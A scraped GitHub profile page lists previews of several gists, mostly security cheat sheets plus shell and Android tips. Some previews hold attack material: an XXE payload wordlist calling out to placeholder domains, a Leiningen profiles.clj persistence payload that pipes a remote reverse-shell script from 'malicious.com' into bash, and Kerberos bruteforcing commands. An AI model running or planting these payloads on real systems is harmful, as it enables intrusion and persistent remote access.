Skip to content

Instantly share code, notes, and snippets.

View presianbg's full-sized avatar

Presian Yankulov presianbg

42 followers · 62 following
View GitHub Profile
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active November 24, 2025 11:24
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@ClementNerma
ClementNerma / zsh-cheatsheet.md
Last active January 4, 2026 04:11

ZSH CheatSheet

This is a cheat sheet for how to perform various actions to ZSH, which can be tricky to find on the web as the syntax is not intuitive and it is generally not very well-documented.

Strings

Description Syntax
Get the length of a string ${#VARNAME}
Get a single character ${VARNAME[index]}
@honoki
honoki / xxe-payloads.txt
Last active December 11, 2025 18:24
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@intrd
intrd / android_tips.txt
Last active October 16, 2021 11:32
Intrd tips for Android battery lasts forever
## go to settings:
* apps & notifications > app info > disable builtin google services/apps (home/chrome/gmail/assistant/googlefi/cloud print/services for ar/)
* battery usage > adaptive on
* battery usage > enable background restriction for everything
* special app access > batt optimization > all apps > choose apps > optimize on/off
* special app access > unrestricted data > choose apps on/off
* dev opt > disable animation scales (speed gain)
* acessibility > remove animations
* dev opt > picture color, disable sRGB
* dev opt > wifi throttling
@s0h3ck
s0h3ck / notes
Last active December 25, 2022 04:06
Quick Discord Notes - Training: Active Defense & Cyber Deception w/ John Strand [04-09-2020]
AV Products or Companies:
Avast
BitDefender
Carbon Black
Check Point
Cisco
ClamAV
CrowdStrike
Cylance
Elastic Endpoint Security
@mthbernardes
mthbernardes / payload.edn
Last active February 25, 2022 12:00
persistence using Leiningen profiles.clj
;;Adding the following payload on $HOME/.lein/profiles.clj map makes Leiningen (https://leiningen.org)
;;work as a post exploitation persistence.
{:whatever-name-you-want #=(eval
(do
(use '[clojure.java.shell :only [sh]])
(require '[clojure.java.shell :as shell])
(shell/sh "bash" "-c" "curl https://malicious.com/revshell.sh | bash")))}
@Neo23x0
Neo23x0 / Base64_CheatSheet.md
Last active December 1, 2025 19:51
Learning Aid - Top Base64 Encodings Table

Base64 Patterns - Learning Aid

Base64 Code Mnemonic Aid Decoded* Description
JAB 🗣 Jabber $. Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env:
TVq 📺 Television MZ MZ header
SUVY 🚙 SUV IEX PowerShell Invoke Expression
SQBFAF 🐣 Squab favorite I.E. PowerShell Invoke Expression (UTF-16)
SQBuAH 🐣 Squab uahhh I.n. PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz
PAA 💪 "Pah!" &lt;. Often used by Emotet (UTF-16)
@Jabarabo
Jabarabo / githubpull.md
Last active December 24, 2025 13:48
Gist of a stolen gist
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@Rhynorater
Rhynorater / bookmarklet.js
Created March 27, 2018 01:19
OSCP Video Playback Speed Increase
javascript:document.getElementById("video").defaultPlaybackRate = prompt("Enter your prefered playback rate:");document.getElementById("video").load();